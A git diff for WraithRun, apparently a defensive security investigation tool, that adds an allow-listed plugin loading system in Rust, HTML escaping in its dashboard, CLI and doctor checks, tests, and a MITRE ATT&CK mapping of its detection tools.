+      html += '<div class="diff-changed"><span class="sev ' + (sevMapA[f.title] || '').toLowerCase() + '">' + (sevMapA[f.title] || '') + '</span> → <span class="sev ' + (f.severity || '').toLowerCase() + '">' + (f.severity || '') + '</span> ' + esc(f.title) + '</div>';
+    });
+  }
+  if (!newFindings.length && !resolvedFindings.length && !changedFindings.length) {
+    html += '<div class="empty" style="padding:1rem">No differences found between these runs.</div>';
+  }
+  html += '</div>';
+  container.innerHTML = html;
+}
+
+// ---------------------------------------------------------------------------
 // Health tab
+// ---------------------------------------------------------------------------
 async function loadHealth() {
   const grid = document.getElementById('health-grid');
   try {
@@ -329,29 +697,32 @@ <h1>WraithRun</h1>
     const health = await healthR.json();
     const ready = await readyR.json();
     const status = await statusR.json();
-    grid.innerHTML = `
-      <div class="stat-card"><div class="value" style="color:var(--green)">${health.status}</div><div class="label">Status</div></div>
-      <div class="stat-card"><div class="value">${health.version}</div><div class="label">Version</div></div>
-      <div class="stat-card"><div class="value">${formatUptime(health.uptime_secs)}</div><div class="label">Uptime</div></div>
-      <div class="stat-card"><div class="value">${ready.tools_available}</div><div class="label">Tools</div></div>
-      <div class="stat-card"><div class="value">${status.mode}</div><div class="label">Mode</div></div>
-      <div class="stat-card"><div class="value">${status.max_concurrent_runs}</div><div class="label">Max Concurrent</div></div>
-      <div class="stat-card"><div class="value">${allRuns.length}</div><div class="label">Total Runs</div></div>
-      <div class="stat-card"><div class="value">${allRuns.filter(r=>r.status==='running').length}</div><div class="label">Active Runs</div></div>
-    `;
+    grid.innerHTML =
+      '<div class="stat-card"><div class="value" style="color:var(--green)">' + esc(health.status) + '</div><div class="label">Status</div></div>'
+      + '<div class="stat-card"><div class="value">' + esc(health.version) + '</div><div class="label">Version</div></div>'
+      + '<div class="stat-card"><div class="value">' + formatUptime(health.uptime_secs) + '</div><div class="label">Uptime</div></div>'
+      + '<div class="stat-card"><div class="value">' + ready.tools_available + '</div><div class="label">Tools</div></div>'
+      + '<div class="stat-card"><div class="value">' + esc(status.mode) + '</div><div class="label">Mode</div></div>'
+      + '<div class="stat-card"><div class="value">' + status.max_concurrent_runs + '</div><div class="label">Max Concurrent</div></div>'
+      + '<div class="stat-card"><div class="value">' + allRuns.length + '</div><div class="label">Total Runs</div></div>'
+      + '<div class="stat-card"><div class="value">' + allRuns.filter(function(r) { return r.status === 'running'; }).length + '</div><div class="label">Active Runs</div></div>';
   } catch { grid.innerHTML = '<div class="empty">Cannot load health data.</div>'; }
 }
 
+// ---------------------------------------------------------------------------
 // Tab switching
+// ---------------------------------------------------------------------------
 function switchTab(name) {
-  document.querySelectorAll('.tab').forEach(t => t.classList.toggle('active', t.dataset.tab === name));
-  ['runs','findings','health'].forEach(t => {
+  document.querySelectorAll('.tab').forEach(function(t) { t.classList.toggle('active', t.dataset.tab === name); });
+  ['runs','findings','cases','compare','health'].forEach(function(t) {
     document.getElementById('tab-' + t).style.display = t === name ? '' : 'none';
   });
   if (name === 'health') loadHealth();
+  if (name === 'cases') loadCases();
+  if (name === 'compare') populateCompareSelects();
 }
 
-function esc(s) { const d = document.createElement('div'); d.textContent = s || ''; return d.innerHTML; }
+function esc(s) { var d = document.createElement('div'); d.textContent = s || ''; return d.innerHTML; }
 
 async function refresh() {
   await pollHealth();
diff --git a/api_server/src/routes.rs b/api_server/src/routes.rs
index ffa5ca6..ec96fb3 100644
--- a/api_server/src/routes.rs
+++ b/api_server/src/routes.rs
@@ -688,6 +688,7 @@ async fn list_case_runs(
 struct RuntimeStatusResponse {
     mode: &'static str,
     tools_available: Vec<String>,
+    plugin_tools: Vec<String>,
     max_concurrent_runs: usize,
 }
 
@@ -696,6 +697,7 @@ async fn runtime_status(State(state): State<AppState>) -> Json<RuntimeStatusResp
     Json(RuntimeStatusResponse {
         mode: "dry-run",
         tools_available: registry.tool_names(),
+        plugin_tools: state.config.plugin_tool_names.clone(),
         max_concurrent_runs: state.config.max_concurrent_runs,
     })
 }
diff --git a/api_server/src/state.rs b/api_server/src/state.rs
index d67b3c6..087647e 100644
--- a/api_server/src/state.rs
+++ b/api_server/src/state.rs
@@ -27,6 +27,8 @@ pub struct ServerConfig {
     pub database_path: Option<PathBuf>,
     /// Path to the audit log file. If None, audit events are kept in-memory only.
     pub audit_log_path: Option<PathBuf>,
+    /// Names of loaded plugin tools (populated at startup).
+    pub plugin_tool_names: Vec<String>,
 }
 
 impl Default for ServerConfig {
@@ -39,6 +41,7 @@ impl Default for ServerConfig {
             max_request_body_bytes: 1_048_576,
             database_path: None,
             audit_log_path: None,
+            plugin_tool_names: Vec::new(),
         }
     }
 }
diff --git a/cli/src/main.rs b/cli/src/main.rs
index fd423a7..5c500fa 100644
--- a/cli/src/main.rs
+++ b/cli/src/main.rs
@@ -687,6 +687,15 @@ struct Cli {
     #[arg(long, value_name = "PATH", requires = "serve")]
     audit_log: Option<PathBuf>,
 
+    /// Directory containing plugin tool subdirectories (each with a tool.toml).
+    #[arg(long, value_name = "PATH")]
+    tools_dir: Option<PathBuf>,
+
+    /// Comma-separated list of plugin names to allow. Plugins not on this list
+    /// are ignored during discovery.
+    #[arg(long, value_delimiter = ',')]
+    allowed_plugins: Vec<String>,
+
     #[arg(long)]
     config: Option<PathBuf>,
 
@@ -828,6 +837,8 @@ struct RuntimeConfig {
     vitis_cache_dir: Option<String>,
     vitis_cache_key: Option<String>,
     capability_override: Option<CapabilityOverride>,
+    tools_dir: Option<PathBuf>,
+    allowed_plugins: Vec<String>,
 }
 
 #[derive(Debug, Serialize)]
@@ -1145,6 +1156,8 @@ impl RuntimeConfig {
             vitis_cache_dir: None,
             vitis_cache_key: None,
             capability_override: None,
+            tools_dir: None,
+            allowed_plugins: Vec::new(),
         }
     }
 
@@ -1440,6 +1453,20 @@ async fn main() -> Result<()> {
         if let Some(audit_path) = &cli.audit_log {
             config.audit_log_path = Some(audit_path.clone());
         }
+        if !cli.allowed_plugins.is_empty() {
+            let tools_dir = cli
+                .tools_dir
+                .clone()
+                .unwrap_or_else(cyber_tools::plugin::PluginConfig::default_tools_dir);
+            let plugin_config = cyber_tools::plugin::PluginConfig::new(
+                tools_dir,
+                cli.allowed_plugins.clone(),
+            );
+            let policy = cyber_tools::SandboxPolicy::default();
+            let plugins = cyber_tools::plugin::discover_plugins(&plugin_config, &policy);
+            config.plugin_tool_names =
+                plugins.iter().map(|t| t.spec().name.clone()).collect();
+        }
         run_server(config).await?;
         return Ok(());
     }
@@ -2529,6 +2556,12 @@ fn apply_cli_overrides(runtime: &mut RuntimeConfig, cli: &Cli) {
     if let Some(capability_override) = cli.capability_override {
         runtime.capability_override = Some(capability_override);
     }
+    if let Some(tools_dir) = &cli.tools_dir {
+        runtime.tools_dir = Some(tools_dir.clone());
+    }
+    if !cli.allowed_plugins.is_empty() {
+        runtime.allowed_plugins = cli.allowed_plugins.clone();
+    }
 }
 
 fn apply_fragment_with_source(
@@ -3894,6 +3927,55 @@ fn run_doctor(cli: &Cli) -> DoctorReport {
                         );
                     }
                 }
+
+                // Plugin tools check.
+                if !runtime.allowed_plugins.is_empty() {
+                    let tools_dir = runtime
+                        .tools_dir
+                        .clone()
+                        .unwrap_or_else(cyber_tools::plugin::PluginConfig::default_tools_dir);
+                    if tools_dir.is_dir() {
+                        let config = cyber_tools::plugin::PluginConfig::new(
+                            tools_dir.clone(),
+                            runtime.allowed_plugins.clone(),
+                        );
+                        let policy = cyber_tools::SandboxPolicy::default();
+                        let plugins = cyber_tools::plugin::discover_plugins(&config, &policy);
+                        if plugins.is_empty() {
+                            report.push(
+                                DoctorStatus::Warn,
+                                "plugin-tools",
+                                format!(
+                                    "No plugin tools loaded from {} (allowed: {:?})",
+                                    tools_dir.display(),
+                                    runtime.allowed_plugins,
+                                ),
+                            );
+                        } else {
+                            let names: Vec<String> =
+                                plugins.iter().map(|t| t.spec().name.clone()).collect();
+                            report.push(
+                                DoctorStatus::Pass,
+                                "plugin-tools",
+                                format!(
+                                    "Loaded {} plugin tool(s) from {}: {}",
+                                    plugins.len(),
+                                    tools_dir.display(),
+                                    names.join(", "),
+                                ),
+                            );
+                        }
+                    } else {
+                        report.push(
+                            DoctorStatus::Warn,
+                            "plugin-tools",
+                            format!(
+                                "Plugin tools directory not found: {}",
+                                tools_dir.display(),
+                            ),
+                        );
+                    }
+                }
             }
             Err(err) => {
                 report.push(
@@ -5678,7 +5760,17 @@ async fn run_agent_once(runtime: &RuntimeConfig, dry_run: bool) -> Result<RunRep
     };
 
     let brain = OnnxVitisEngine::new(model_config);
-    let tools = ToolRegistry::with_default_tools();
+    let mut tools = ToolRegistry::with_default_tools();
+    // Load plugin tools if configured.
+    if !runtime.allowed_plugins.is_empty() {
+        let tools_dir = runtime
+            .tools_dir
+            .clone()
+            .unwrap_or_else(cyber_tools::plugin::PluginConfig::default_tools_dir);
+        let plugin_config =
+            cyber_tools::plugin::PluginConfig::new(tools_dir, runtime.allowed_plugins.clone());
+        tools.load_plugins(&plugin_config);
+    }
     let mut agent = Agent::new(brain, tools)
         .with_max_steps(runtime.max_steps)
         .with_capability_tier(tier);
@@ -5899,6 +5991,8 @@ mod tests {
             vitis_cache_dir: None,
             vitis_cache_key: None,
             capability_override: None,
+            tools_dir: None,
+            allowed_plugins: vec![],
         }
     }
 
diff --git a/cyber_tools/Cargo.toml b/cyber_tools/Cargo.toml
index 8091fdd..bb01c82 100644
--- a/cyber_tools/Cargo.toml
+++ b/cyber_tools/Cargo.toml
@@ -10,5 +10,9 @@ serde.workspace = true
 serde_json.workspace = true
 sha2.workspace = true
 thiserror.workspace = true
+toml.workspace = true
 tokio.workspace = true
 tracing.workspace = true
+
+[dev-dependencies]
+tempfile = "3"
diff --git a/cyber_tools/src/lib.rs b/cyber_tools/src/lib.rs
index c6efa50..350f0ba 100644
--- a/cyber_tools/src/lib.rs
+++ b/cyber_tools/src/lib.rs
@@ -2,6 +2,7 @@ pub mod account_audit;
 pub mod log_parser;
 pub mod network_scanner;
 pub mod persistence_checker;
+pub mod plugin;
 pub mod process_correlation;
 
 use std::{
@@ -275,6 +276,14 @@ impl ToolRegistry {
         self.tools.insert(name, tool);
     }
 
+    /// Load plugin tools from a directory. Plugins must be explicitly allowed.
+    pub fn load_plugins(&mut self, config: &plugin::PluginConfig) {
+        let plugins = plugin::discover_plugins(config, &self.policy);
+        for tool in plugins {
+            self.register(tool);
+        }
+    }
+
     pub fn policy(&self) -> &SandboxPolicy {
         &self.policy
     }
diff --git a/cyber_tools/src/plugin.rs b/cyber_tools/src/plugin.rs
new file mode 100644
index 0000000..f483ac3
--- /dev/null
+++ b/cyber_tools/src/plugin.rs
@@ -0,0 +1,516 @@
+//! Plugin tool discovery and execution.
+//!
+//! Plugins are external tools defined by a `tool.toml` manifest and executed as
+//! subprocesses. They communicate via JSON on stdin/stdout and are subject to
+//! the same sandbox policy as built-in tools.
+
+use std::collections::HashSet;
+use std::path::{Path, PathBuf};
+use std::sync::Arc;
+use std::time::Duration;
+
+use async_trait::async_trait;
+use serde::{Deserialize, Serialize};
+use serde_json::{json, Value};
+use tracing::{debug, warn};
+
+use crate::{SandboxPolicy, Tool, ToolError, ToolSpec};
+
+/// Default timeout for plugin process execution (30 seconds).
+const DEFAULT_TIMEOUT_SECS: u64 = 30;
+
+/// Maximum plugin stdout size (1 MiB).
+const MAX_STDOUT_BYTES: usize = 1_048_576;
+
+// ---------------------------------------------------------------------------
+// Manifest types
+// ---------------------------------------------------------------------------
+
+/// Parsed `tool.toml` manifest for a plugin tool.
+#[derive(Debug, Clone, Deserialize)]
+pub struct PluginManifest {
+    pub name: String,
+    pub description: String,
+    #[serde(default)]
+    pub version: String,
+    /// Command to execute (relative to plugin directory).
+    pub command: String,
+    /// Supported platforms. Empty means all platforms.
+    #[serde(default)]
+    pub platforms: Vec<String>,
+    /// Optional timeout override in seconds.
+    #[serde(default)]
+    pub timeout_secs: Option<u64>,
+    /// Parameter definitions.
+    #[serde(default)]
+    pub parameters: std::collections::HashMap<String, PluginParameter>,
+}
+
+/// A single parameter definition in the plugin manifest.
+#[derive(Debug, Clone, Deserialize, Serialize)]
+pub struct PluginParameter {
+    #[serde(rename = "type")]
+    pub param_type: String,
+    #[serde(default)]
+    pub required: bool,
+    #[serde(default)]
+    pub description: String,
+}
+
+// ---------------------------------------------------------------------------
+// Plugin tool
+// ---------------------------------------------------------------------------
+
+/// A tool backed by an external subprocess.
+#[derive(Debug, Clone)]
+pub struct PluginTool {
+    manifest: PluginManifest,
+    /// Absolute path to the plugin directory.
+    plugin_dir: PathBuf,
+    /// Resolved absolute path to the command.
+    command_path: PathBuf,
+    timeout: Duration,
+}
+
+impl PluginTool {
+    /// Resolve the command path from the manifest.
+    fn resolve_command(plugin_dir: &Path, command: &str) -> PathBuf {
+        let path = Path::new(command);
+        if path.is_absolute() {
+            path.to_path_buf()
+        } else {
+            plugin_dir.join(path)
+        }
+    }
+
+    pub fn manifest(&self) -> &PluginManifest {
+        &self.manifest
+    }
+}
+
+#[async_trait]
+impl Tool for PluginTool {
+    fn spec(&self) -> ToolSpec {
+        // Build args schema from parameters.
+        let mut properties = serde_json::Map::new();
+        let mut required = Vec::new();
+        for (name, param) in &self.manifest.parameters {
+            let mut prop = serde_json::Map::new();
+            prop.insert("type".to_string(), json!(param.param_type));
+            if !param.description.is_empty() {
+                prop.insert("description".to_string(), json!(param.description));
+            }
+            properties.insert(name.clone(), Value::Object(prop));
+            if param.required {
+                required.push(json!(name));
+            }
+        }
+        let schema = json!({
+            "type": "object",
+            "properties": properties,
+            "required": required,
+        });
+        ToolSpec {
+            name: self.manifest.name.clone(),
+            description: self.manifest.description.clone(),
+            args_schema: schema,
+        }
+    }
+
+    async fn run(&self, args: Value) -> Result<Value, ToolError> {
+        let stdin_payload = serde_json::to_string(&args)
+            .map_err(|e| ToolError::Execution(format!("serialize args: {e}")))?;
+
+        debug!(
+            plugin = %self.manifest.name,
+            command = %self.command_path.display(),
+            "executing plugin tool"
+        );
+
+        let mut cmd = tokio::process::Command::new(&self.command_path);
+        cmd.current_dir(&self.plugin_dir);
+        cmd.stdin(std::process::Stdio::piped());
+        cmd.stdout(std::process::Stdio::piped());
+        cmd.stderr(std::process::Stdio::piped());
+
+        let mut child = cmd.spawn().map_err(|e| {
+            ToolError::Execution(format!(
+                "failed to spawn plugin '{}': {e}",
+                self.manifest.name
+            ))
+        })?;
+
+        // Write stdin.
+        if let Some(mut stdin) = child.stdin.take() {
+            use tokio::io::AsyncWriteExt;
+            let _ = stdin.write_all(stdin_payload.as_bytes()).await;
+            drop(stdin);
+        }
+
+        // Wait with timeout.
+        let output = tokio::time::timeout(self.timeout, child.wait_with_output())
+            .await
+            .map_err(|_| {
+                ToolError::Execution(format!(
+                    "plugin '{}' timed out after {}s",
+                    self.manifest.name,
+                    self.timeout.as_secs()
+                ))
+            })?
+            .map_err(|e| {
+                ToolError::Execution(format!(
+                    "plugin '{}' execution error: {e}",
+                    self.manifest.name
+                ))
+            })?;
+
+        if !output.status.success() {
+            let stderr = String::from_utf8_lossy(&output.stderr);
+            return Err(ToolError::Execution(format!(
+                "plugin '{}' exited with {}: {}",
+                self.manifest.name,
+                output.status,
+                stderr.chars().take(500).collect::<String>()
+            )));
+        }
+
+        // Parse stdout as JSON.
+        let stdout = &output.stdout[..output.stdout.len().min(MAX_STDOUT_BYTES)];
+        let result: Value =
+            serde_json::from_slice(stdout).map_err(|e| {
+                ToolError::Execution(format!(
+                    "plugin '{}' produced invalid JSON: {e}",
+                    self.manifest.name
+                ))
+            })?;
+
+        Ok(result)
+    }
+}
+
+// ---------------------------------------------------------------------------
+// Discovery
+// ---------------------------------------------------------------------------
+
+/// Configuration for plugin loading.
+#[derive(Debug, Clone)]
+pub struct PluginConfig {
+    /// Directory to scan for plugin subdirectories.
+    pub tools_dir: PathBuf,
+    /// Explicit allow-list of plugin names. Empty = deny all.
+    pub allowed_plugins: HashSet<String>,
+}
+
+impl PluginConfig {
+    pub fn new(tools_dir: PathBuf, allowed: Vec<String>) -> Self {
+        Self {
+            tools_dir,
+            allowed_plugins: allowed.into_iter().collect(),
+        }
+    }
+
+    /// Default tools directory: `~/.config/wraithrun/tools/`.
+    pub fn default_tools_dir() -> PathBuf {
+        dirs_path().join("tools")
+    }
+}
+
+fn dirs_path() -> PathBuf {
+    #[cfg(target_os = "windows")]
+    {
+        std::env::var_os("APPDATA")
+            .map(PathBuf::from)
+            .unwrap_or_else(|| PathBuf::from("."))
+            .join("wraithrun")
+    }
+    #[cfg(not(target_os = "windows"))]
+    {
+        std::env::var_os("HOME")
+            .map(PathBuf::from)
+            .unwrap_or_else(|| PathBuf::from("."))
+            .join(".config")
+            .join("wraithrun")
+    }
+}
+
+/// Scan a tools directory and return loaded plugin tools.
+///
+/// Each subdirectory must contain a `tool.toml`. Plugins not in the
+/// `allowed_plugins` set are skipped.
+pub fn discover_plugins(
+    config: &PluginConfig,
+    policy: &SandboxPolicy,
+) -> Vec<Arc<dyn Tool>> {
+    let mut tools: Vec<Arc<dyn Tool>> = Vec::new();
+
+    let entries = match std::fs::read_dir(&config.tools_dir) {
+        Ok(entries) => entries,
+        Err(e) => {
+            debug!(
+                dir = %config.tools_dir.display(),
+                error = %e,
+                "plugin directory not found, skipping plugin discovery"
+            );
+            return tools;
+        }
+    };
+
+    for entry in entries.flatten() {
+        let path = entry.path();
+        if !path.is_dir() {
+            continue;
+        }
+
+        let manifest_path = path.join("tool.toml");
+        if !manifest_path.is_file() {
+            debug!(dir = %path.display(), "skipping directory without tool.toml");
+            continue;
+        }
+
+        match load_plugin(&path, &manifest_path, config, policy) {
+            Ok(tool) => {
+                debug!(name = %tool.manifest().name, "loaded plugin tool");
+                tools.push(Arc::new(tool));
+            }
+            Err(e) => {
+                warn!(dir = %path.display(), error = %e, "failed to load plugin");
+            }
+        }
+    }
+
+    tools
+}
+
+fn load_plugin(
+    plugin_dir: &Path,
+    manifest_path: &Path,
+    config: &PluginConfig,
+    policy: &SandboxPolicy,
+) -> Result<PluginTool, ToolError> {
+    let content = std::fs::read_to_string(manifest_path)
+        .map_err(|e| ToolError::Execution(format!("read manifest: {e}")))?;
+
+    let manifest: PluginManifest = toml::from_str(&content)
+        .map_err(|e| ToolError::Execution(format!("parse manifest: {e}")))?;
+
+    // Check allow-list.
+    if !config.allowed_plugins.contains(&manifest.name) {
+        return Err(ToolError::PolicyDenied(format!(
+            "plugin '{}' is not in the allowed_plugins list",
+            manifest.name
+        )));
+    }
+
+    // Check platform.
+    if !manifest.platforms.is_empty() {
+        let current = current_platform();
+        if !manifest.platforms.iter().any(|p| p == current) {
+            return Err(ToolError::Execution(format!(
+                "plugin '{}' does not support platform '{current}'",
+                manifest.name
+            )));
+        }
+    }
+
+    // Resolve and validate command.
+    let command_path = PluginTool::resolve_command(plugin_dir, &manifest.command);
+    if !command_path.is_file() {
+        return Err(ToolError::Execution(format!(
+            "plugin command not found: {}",
+            command_path.display()
+        )));
+    }
+
+    // Validate command against sandbox policy.
+    let cmd_name = command_path
+        .file_name()
+        .and_then(|n| n.to_str())
+        .unwrap_or("");
+    if policy.command_denylist.contains(&cmd_name.to_ascii_lowercase()) {
+        return Err(ToolError::PolicyDenied(format!(
+            "plugin command '{cmd_name}' is in the sandbox denylist"
+        )));
+    }
+
+    let timeout = Duration::from_secs(manifest.timeout_secs.unwrap_or(DEFAULT_TIMEOUT_SECS));
+
+    Ok(PluginTool {
+        manifest,
+        plugin_dir: plugin_dir.to_path_buf(),
+        command_path,
+        timeout,
+    })
+}
+
+fn current_platform() -> &'static str {
+    #[cfg(target_os = "linux")]
+    {
+        "linux"
+    }
+    #[cfg(target_os = "macos")]
+    {
+        "macos"
+    }
+    #[cfg(target_os = "windows")]
+    {
+        "windows"
+    }
+    #[cfg(not(any(target_os = "linux", target_os = "macos", target_os = "windows")))]
+    {
+        "unknown"
+    }
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::io::Write;
+    use tempfile::TempDir;
+
+    fn write_manifest(dir: &Path, content: &str) {
+        let mut f = std::fs::File::create(dir.join("tool.toml")).unwrap();
+        f.write_all(content.as_bytes()).unwrap();
+    }
+
+    #[test]
+    fn parse_manifest() {
+        let toml_str = r#"
+name = "test_tool"
+description = "A test plugin"
+version = "0.1.0"
+command = "./run.sh"
+platforms = ["linux", "macos"]
+
+[parameters]
+target = { type = "string", required = true, description = "target path" }
+"#;
+        let manifest: PluginManifest = toml::from_str(toml_str).unwrap();
+        assert_eq!(manifest.name, "test_tool");
+        assert_eq!(manifest.platforms.len(), 2);
+        assert!(manifest.parameters.contains_key("target"));
+        assert!(manifest.parameters["target"].required);
+    }
+
+    #[test]
+    fn discover_skips_disallowed_plugins() {
+        let tmp = TempDir::new().unwrap();
+        let plugin_dir = tmp.path().join("my_plugin");
+        std::fs::create_dir_all(&plugin_dir).unwrap();
+        write_manifest(
+            &plugin_dir,
+            r#"
+name = "my_plugin"
+description = "test"
+command = "./run.sh"
+"#,
+        );
+        // Create a dummy command file.
+        std::fs::write(plugin_dir.join("run.sh"), "#!/bin/sh\necho {}").unwrap();
+
+        let config = PluginConfig::new(tmp.path().to_path_buf(), vec![]); // empty allow-list
+        let policy = SandboxPolicy::strict_default();
+        let tools = discover_plugins(&config, &policy);
+        assert!(tools.is_empty(), "disallowed plugin should not be loaded");
+    }
+
+    #[test]
+    fn discover_loads_allowed_plugin() {
+        let tmp = TempDir::new().unwrap();
+        let plugin_dir = tmp.path().join("allowed_plugin");
+        std::fs::create_dir_all(&plugin_dir).unwrap();
+        write_manifest(
+            &plugin_dir,
+            &format!(
+                r#"
+name = "allowed_plugin"
+description = "an allowed test plugin"
+command = "./run.sh"
+platforms = ["{platform}"]
+"#,
+                platform = current_platform()
+            ),
+        );
+        // Create a dummy command file.
+        let cmd_path = plugin_dir.join("run.sh");
+        std::fs::write(&cmd_path, "#!/bin/sh\necho {}").unwrap();
+        #[cfg(unix)]
+        {
+            use std::os::unix::fs::PermissionsExt;
+            std::fs::set_permissions(&cmd_path, std::fs::Permissions::from_mode(0o755)).unwrap();
+        }
+
+        let config = PluginConfig::new(
+            tmp.path().to_path_buf(),
+            vec!["allowed_plugin".to_string()],
+        );
+        let policy = SandboxPolicy::strict_default();
+        let tools = discover_plugins(&config, &policy);
+        assert_eq!(tools.len(), 1);
+        assert_eq!(tools[0].spec().name, "allowed_plugin");
+    }
+
+    #[test]
+    fn discover_skips_wrong_platform() {
+        let tmp = TempDir::new().unwrap();
+        let plugin_dir = tmp.path().join("wrong_platform");
+        std::fs::create_dir_all(&plugin_dir).unwrap();
+        write_manifest(
+            &plugin_dir,
+            r#"
+name = "wrong_platform"
+description = "wrong platform"
+command = "./run.sh"
+platforms = ["nonexistent_os"]
+"#,
+        );
+        std::fs::write(plugin_dir.join("run.sh"), "#!/bin/sh\necho {}").unwrap();
+
+        let config = PluginConfig::new(
+            tmp.path().to_path_buf(),
+            vec!["wrong_platform".to_string()],
+        );
+        let policy = SandboxPolicy::strict_default();
+        let tools = discover_plugins(&config, &policy);
+        assert!(tools.is_empty(), "wrong-platform plugin should not load");
+    }
+
+    #[test]
+    fn plugin_spec_includes_parameters() {
+        let manifest = PluginManifest {
+            name: "test".to_string(),
+            description: "desc".to_string(),
+            version: "0.1.0".to_string(),
+            command: "./run".to_string(),
+            platforms: vec![],
+            timeout_secs: None,
+            parameters: {
+                let mut m = std::collections::HashMap::new();
+                m.insert(
+                    "path".to_string(),
+                    PluginParameter {
+                        param_type: "string".to_string(),
+                        required: true,
+                        description: "target path".to_string(),
+                    },
+                );
+                m
+            },
+        };
+        let tool = PluginTool {
+            manifest,
+            plugin_dir: PathBuf::from("."),
+            command_path: PathBuf::from("./run"),
+            timeout: Duration::from_secs(30),
+        };
+        let spec = tool.spec();
+        assert_eq!(spec.name, "test");
+        let props = spec.args_schema["properties"].as_object().unwrap();
+        assert!(props.contains_key("path"));
+        let required = spec.args_schema["required"].as_array().unwrap();
+        assert_eq!(required.len(), 1);
+    }
+}
diff --git a/docs/index.md b/docs/index.md
index 87628a9..a7c19f5 100644
--- a/docs/index.md
+++ b/docs/index.md
@@ -13,6 +13,23 @@ Use this documentation to install, run, and operate WraithRun in your own enviro
 - [Security and Sandbox](security-sandbox.md): policy controls and environment variables.
 - [Troubleshooting](troubleshooting.md): common errors and fixes.
 
+## Investigation Playbooks
+
+Step-by-step guides for common security investigation scenarios.
+
+- [Investigate Suspicious SSH Keys](playbook-ssh-keys.md)
+- [Triage a Compromised Windows Workstation](playbook-windows-triage.md)
+- [Audit Privileged Accounts After a Credential Leak](playbook-credential-leak.md)
+- [Check for Persistence Mechanisms Post-Breach](playbook-persistence-sweep.md)
+
+## Reference
+
+- [Plugin API](plugin-api.md): extend WraithRun with external tool plugins.
+- [MITRE ATT&CK Mapping](mitre-attack-mapping.md): tools mapped to ATT&CK techniques.
+- [Threat Model](threat-model.md): WraithRun's attack surface, trust boundaries, and security controls.
+- [Sample Report: Linux Persistence](sample-report-linux-persistence.md)
+- [Sample Report: Windows Triage](sample-report-windows-triage.md)
+
 ## Operations and Releases
 
 - [Release Plan](RELEASE_PLAN.md)
diff --git a/docs/mitre-attack-mapping.md b/docs/mitre-attack-mapping.md
new file mode 100644
index 0000000..1836305
--- /dev/null
+++ b/docs/mitre-attack-mapping.md
@@ -0,0 +1,54 @@
+# MITRE ATT&CK Mapping
+
+This document maps each WraithRun built-in tool to the MITRE ATT&CK techniques it helps detect or investigate. Technique IDs reference the [Enterprise ATT&CK Matrix](https://attack.mitre.org/matrices/enterprise/).
+
+## Tool-to-Technique Reference
+
+| Tool | ATT&CK Techniques | Description |
+|------|-------------------|-------------|
+| `read_syslog` | [T1070.002](https://attack.mitre.org/techniques/T1070/002/) — Clear Linux or Mac System Logs | Reads log entries to detect evidence of log tampering or gaps |
+| | [T1078](https://attack.mitre.org/techniques/T1078/) — Valid Accounts | Identifies authentication events indicating credential reuse |
+| | [T1110](https://attack.mitre.org/techniques/T1110/) — Brute Force | Detects patterns of failed login attempts |
+| `scan_network` | [T1049](https://attack.mitre.org/techniques/T1049/) — System Network Connections Discovery | Lists active listening sockets and connections |
+| | [T1071](https://attack.mitre.org/techniques/T1071/) — Application Layer Protocol | Identifies unexpected outbound connections on standard ports |
+| | [T1572](https://attack.mitre.org/techniques/T1572/) — Protocol Tunneling | Detects unusual port usage that may indicate tunneling |
+| `hash_binary` | [T1036](https://attack.mitre.org/techniques/T1036/) — Masquerading | Verifies file integrity to detect replaced or trojanized binaries |
+| | [T1027](https://attack.mitre.org/techniques/T1027/) — Obfuscated Files or Information | Produces SHA-256 hashes for threat intelligence correlation |
+| `check_privilege_escalation_vectors` | [T1548](https://attack.mitre.org/techniques/T1548/) — Abuse Elevation Control Mechanism | Checks for SUID/SGID binaries, sudo misconfigurations |
+| | [T1574.009](https://attack.mitre.org/techniques/T1574/009/) — Path Interception by Unquoted Service Path | Detects unquoted Windows service paths |
+| | [T1068](https://attack.mitre.org/techniques/T1068/) — Exploitation for Privilege Escalation | Identifies writable service binaries and weak permissions |
+| `inspect_persistence_locations` | [T1053](https://attack.mitre.org/techniques/T1053/) — Scheduled Task/Job | Inspects cron jobs, systemd timers, and Windows scheduled tasks |
+| | [T1547.001](https://attack.mitre.org/techniques/T1547/001/) — Registry Run Keys / Startup Folder | Checks Windows Run keys and startup directories |
+| | [T1543](https://attack.mitre.org/techniques/T1543/) — Create or Modify System Process | Inspects systemd services and Windows services |
+| | [T1546.003](https://attack.mitre.org/techniques/T1546/003/) — Windows Management Instrumentation Event Subscription | Checks for WMI persistence |
+| `audit_account_changes` | [T1136](https://attack.mitre.org/techniques/T1136/) — Create Account | Detects recently created local or domain accounts |
+| | [T1098](https://attack.mitre.org/techniques/T1098/) — Account Manipulation | Identifies group membership changes, especially to privileged groups |
+| | [T1531](https://attack.mitre.org/techniques/T1531/) — Account Access Removal | Detects account deletions or lockouts that may indicate anti-forensics |
+| `correlate_process_network` | [T1071](https://attack.mitre.org/techniques/T1071/) — Application Layer Protocol | Maps processes to their network connections for C2 detection |
+| | [T1095](https://attack.mitre.org/techniques/T1095/) — Non-Application Layer Protocol | Identifies processes using raw sockets or unusual protocols |
+| | [T1571](https://attack.mitre.org/techniques/T1571/) — Non-Standard Port | Detects processes communicating on unexpected ports |
+| | [T1573](https://attack.mitre.org/techniques/T1573/) — Encrypted Channel | Flags encrypted connections to non-standard destinations |
+| `capture_coverage_baseline` | [T1082](https://attack.mitre.org/techniques/T1082/) — System Information Discovery | Captures full system state for comparison and anomaly detection |
+| | [T1057](https://attack.mitre.org/techniques/T1057/) — Process Discovery | Lists all running processes with metadata |
+| | [T1007](https://attack.mitre.org/techniques/T1007/) — System Service Discovery | Enumerates installed and running services |
+
+## Tactic Coverage Summary
+
+| Tactic | Covered Techniques | Primary Tools |
+|--------|-------------------|---------------|
+| Initial Access | T1078 (Valid Accounts) | `read_syslog`, `audit_account_changes` |
+| Execution | T1053 (Scheduled Task) | `inspect_persistence_locations` |
+| Persistence | T1053, T1547, T1543, T1546 | `inspect_persistence_locations`, `capture_coverage_baseline` |
+| Privilege Escalation | T1548, T1574, T1068 | `check_privilege_escalation_vectors` |
+| Defense Evasion | T1036, T1027, T1070 | `hash_binary`, `read_syslog` |
+| Credential Access | T1110 (Brute Force) | `read_syslog` |
+| Discovery | T1049, T1082, T1057, T1007 | `scan_network`, `capture_coverage_baseline` |
+| Lateral Movement | T1078 | `audit_account_changes`, `read_syslog` |
+| Command and Control | T1071, T1095, T1571, T1572, T1573 | `scan_network`, `correlate_process_network` |
+| Impact | T1531 | `audit_account_changes` |
+
+## Notes
+
